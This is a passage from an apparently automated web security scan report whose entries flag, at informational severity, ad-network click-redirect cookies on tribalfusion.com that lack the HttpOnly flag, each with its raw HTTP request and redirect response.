Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:51 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.195. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aOnh31SyZaaguIvQ9UN6ORsZbuleis79XItmZb0P8atB8OjAkU8xKhtbdD6bHZaVnI2TUCe4Zd4PpZb7wHXCZaZbPZdqZdO6mo7JbLZd3xuwbZbHN538buNduG2L81ZaY5pX32oqSqf2x7N6kcPdHSVDe06Zbo85Yn01rbZbQrwZbFpMcjDq6PZaumkobfFsGD5yHWK3SNZc9eWIZbZc53SxWq1pme8CV90Nq6CBimgf4finNqZaZdpEHlnXDX1gEuqUPhN9I1mG3QkTEldbEb2stXISNA8y56Rry2JU3teeA5JyEAAKrqMmOd64bu6BZctFcu2lR2XJSV9BoymIjg3mhHZbqWlQKoZd9NcrCiAZajj2cywhZcaGo4iX5Eo8ZaUcLRUM2p7K1A3bCDJl3AYKTXTUtTBZaZdxJABe2b1xOqBGZanyrnrybc6ZcZdJKV2mpmxtZdPHVDMtNDKEnmxaeDZaDLLyY8UNVQnSYDt2FIdJvwP5myVZaGNRTZag8; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:35 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.196. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.197. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=afnFkjmge0wRusnZd7gvZcatR8ZbEScUCBDXs0j0s50GZb1NZbNHr3QTUauwUM8tQU0eWCZcJwiaT9KOt0ORNDIPwt3Fos42FUhgEgkcn6gbVL7kcYVbsSviZdk498UHG7ll0UOmZaZd03oZbIohusjqYPAOg3P9l1qIXMOOyVcIdYGSRPUWps27MXI47gapuaKm0ivgosOIrnO096QZaussCUB9yqu346N7wR4whrspZaQTuAry7D0DqkWQuEMZaR6D4ZbKvKLDWR1PA8TDijB6RZdtTUZdBnYh8ux1FrrnNPB903ZctJ4lfVtpBjNHNWBwjlOdluDCCKqFZb2brZaMZdROFQhavZcTSkZdyPSbHOIZdVYOMeiosYkFhpmMgM8aIQbfHbK3G8o6QwPyQT1FryGQ8ZcM48FyrtZd8GDZc4sCV1LqZaikES5Zb1ggkhTpxsfVYrnmvEUmhbc9Yds87sZdpP1MHN80q6G6Yp1qE3IS34IhXlTBwHfMShFhrRxjZdx7ycmCBq19hfEiJSscR3Uui17SS4Za0eKOOMWnVRHQdSddDa40Pp8UaZayWOpLbvqshOIEwbP2XJRmnLmXutTHs2ViVDZb32EHl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.198. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:44 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.199. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:51 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.200. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:20 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.201. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=agnhF4SkTAF8iiw8fQKkDVov5ZaVtL4kAJJHuly8Q36RZdu9P8pbfCuSisKOZcKDQXiFTKbrMRNxbBWMLZc4nZcoT0pGB6BrXuUjkmNittGpjkC1xZdD9VcwQUjOl7oyFNhBoOZacm4lY8LwxcYRyGe8NT5QuZaid1S5eljpmQOJ4bQX0HdqPu0oyM7tW6LZcSZdbxkrgktqi5TrhmfRAg5KVQr6jydWeHapkSCorEY5oPPOltPZcjFH4ZcUecfVxg0mrIVGjWcQCJ7k1UAnLdnYyYE2ZccSkhge3hadCbJBYbqd17D9VI4DOSZbD8UNhRfV45JZct312BhBZaITIPBpoQBn8der0fFh4FTS6gl035o36yY73spFfW0SiTyjx0noZbZaZcQIFvxbGBf6uePjMuPtZbrfOEZbdZdsTTdqE6OpUZdBVmMdgZavYrZdcZbZbsr6DVJnXvdXZcWKCpFK8RTvU5qFce0bTXsQwsfW0ktQrmyTbRXsgHZc7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:45 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.202. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:52 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.203. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.204. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
